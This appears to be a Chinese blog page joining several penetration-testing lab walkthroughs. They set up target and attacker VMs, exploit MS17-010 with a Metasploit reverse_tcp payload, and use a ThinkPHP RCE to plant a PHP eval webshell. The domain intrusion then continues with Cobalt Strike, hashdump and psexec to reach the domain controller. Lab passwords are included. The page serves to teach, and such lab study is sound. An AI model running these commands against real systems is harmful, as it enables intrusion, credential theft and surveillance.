一、搭建靶机
点击下一步->完成
二、配置虚拟机win2000server的网络
实际主机:属性->启用
当虚拟机鼠标在虚拟机中出不来时,可以按Ctrl+alt键释放
三、查看靶机IP
登陆账号:Administrator密码:mima1234
硬件向导选“否”
打开“运行”-->键入cmd
得到靶机IP地址为:192.168.67.129
四、从实体主机ping一下靶机
所以,【实体主机-靶机】互通
五、搭建攻击机(Linux-Ubuntu)安装方法同上,以下列举不同的地方
六、开启攻击机(Ubuntu)
Login:root
password:toor
回车:
输入:root@bt:~#startx(进入Ubuntu的图形化界面)
点一下如下图所示的图案:打开terminal
输入:root@bt:~#ifconfig(查看Ubuntu的IP地址)
得到Ubuntu的IP地址为:192.168.67.128
七、在攻击机上检查【攻击机-实体主机】和【攻击机-靶机】是否能ping通
查看实体主机IP地址:+R-->cmd
C:\Users\acer>ipconfig(查看ip地址)
得到实体主机的IP地址为:10.201.212.16
打开Ubuntu的terminal,尝试【攻击机-实体主机】ping
尝试【攻击机-靶机】ping
(第一次在发表文章,没啥经验,分享一些学习经验。大佬们多多包涵,也希望大家能够指出我的错误。)
靶机:windows7 x64 IP:192.168.1.5
攻击机:Kali Rolling (2019.3) x64 IP:192.168.1.3
两台主机在同一网段内;win7关闭防火墙并且开启445端口。
1、使用ipconfig/ifconfig分别查看win7和kali的ip。
2、打开msf工具
每次开启都会有不同的界面
3、使用search命令搜索ms17_010
4、选择模块和设置条件
使用use来选择第三个模块,可以直接 use 2,也可以打全
然后用set来设置靶机IP set rhost 192.168.1.5
设置本机IP set lhost 192.168.1.3
设置监听端口 set lport 8888 不设置则默认4444端口
设置payload set payload windows/x64/meterpreter/reverse_tcp
还有另外一个payload能用于本实验,具体可以 show payloads 查看
最后,可以使用show options检查所有信息
5、开始渗透 run
稍等片刻 看到win则成功创建会话
6、成功之后,可以开启Windows7的摄像头,截图等等
具体可以用help查看
1、关闭445端口
2、打开防火墙,安装安全软件
3、安装对应补丁,这里就不放链接了
关闭445端口的方法:
1)打开控制面板----Windows防火墙----高级设置
2)点击新建规则,设置端口号的规则并且命名(如图)
msf工具虽然强大,但只能用于已知的并且已提交模块的漏洞。要理解漏洞原理,理解如何使用漏洞,甚至自己挖洞才能做到真正的去攻击。而不是简单的使用工具use和set。
网络环境
kali攻击机:
ip为192.168.1.128
靶机win7:
本地管理员用户leo\123.com
域管sun\Administrator dc123.com 改为 20121225Qnmxa@
ip为192.168.1.136和192.168.138.138
靶机win2008:
账号sun\admin 2020.com改为20121225Qnmxa@
ip为192.168.138.138
在win7上打开phpstudy,打开web环境
复现
使用arp-scan -l扫描内网存活主机
找到目标靶机为192.168.1.136
使用nmap进行扫描
nmap 192.168.1.136 -T4 -A -sV
发现了80端口,先访问下
发现为TP5,直接用工具打
可以执行命令,直接写入一句话木马
echo <?php @eval($_POST['cmd'])?>>shell.php
直接用蚁剑连接,然后对目标进行信息搜集
发现有两个网段,一个是1段,另一个是138段,并且在域sun.com中,DNS服务器为192.168.138.138,基本上DNS服务器就是域控
话不多说,直接上CS,直接通过powershell命令上线
设置心跳时间为1秒:sleep 1
然后使用插件直接一键提权,比如梼杌、谢公子插件等,拿到一个system权限的会话
打开system权限的会话,查看防火墙情况
shell netsh firewall show state
是关着的,我手动把它关了
查看域内计算机列表:net view
返现主机DC和WIN7
查看域控列表:net dclist
查看本机用户列表
有3个用户
接下来抓hash:hashdump
抓密码:logonpassword
然后通过“视图”-“密码凭证”查看抓到的密码
点击“视图”-“目标列表”
直接使用psexec配合SMB监听器上线DC机器
拿到了DC的beacon
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)